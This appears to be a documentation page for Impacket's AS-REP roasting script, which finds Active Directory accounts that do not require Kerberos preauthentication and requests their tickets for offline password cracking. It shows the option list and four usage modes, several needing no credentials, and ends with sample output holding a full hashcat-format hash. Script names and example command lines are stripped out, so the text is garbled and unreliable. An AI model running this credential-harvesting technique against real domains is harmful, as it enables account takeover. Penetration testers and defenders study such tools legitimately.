Queries target domain for users with ‘Do not require Kerberos preauthentication’ set and export their TGTs for cracking (ASREPRoasting).


Install Impacket.

Usage [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
                     [-dc-host hostname]


Impacket v0.12.0.dev1+20230803.144057.e2092339 - Copyright 2023 Fortra

positional arguments:
  target                [[domain/]username[:password]]

  -h, --help            show this help message and exit
  -request              Requests TGT for users and output them in JtR/hashcat format (default False)
  -outputfile OUTPUTFILE
                        Output filename to write ciphers in JtR/hashcat format
  -format {hashcat,john}
                        format to save the AS_REQ of users without pre-authentication. Default is hashcat
  -usersfile USERSFILE  File with user per line to test
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used

There are a few modes for using this script

1. Get a TGT for a user: -no-pass

For this operation you don't need john.doe's password. It is important tho, to specify -no-pass in the script, 
otherwise a badpwdcount entry will be added to the user

2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set or

This will list all the users in the domain that have UF_DONT_REQUIRE_PREAUTH set. 
However it will require you to have emily's password. (If you don't specify it, it will be asked by the script)

3. Request TGTs for all users -request or

4. Request TGTs for users in a file -no-pass -usersfile users.txt

For this operation you don't need credentials.

Examples -usersfile users -dc-ip
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] User johndo doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:0507c99ed0c44924dee1bd4fdb34e0b9$e6abe0cd017c45688ff4d667183ce9c8cb171635250c7a5d1f12666549466ecb367e6445751b867a44f483e8b255ebd039ea7375229a1c6763eb61965d34945b8500058e36dd32fadd6bdc5dc5fff5ef6ebc90343bdf177984852b3536fb12ab4a21f8cdee93339e7fc97d3028eb1f7643e1c9156f7d1facd658dd5b2061572f615abc4ea4007294ee648f38af428ef5f7045bb194c44bfef4f39f14ad02e982f74ef49a5a904e874ce1c2b5a38b61a4b30b58b2b521f4f81cdaee348b497a9ca757fe33e30e9ef6c7911963e120e905f5cf063964b5a13f7d9668a1f3e63466d1c0d18d9e76e31a8bec236fff42fa928dac
[-] User johndo-adm doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User janedo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

URL List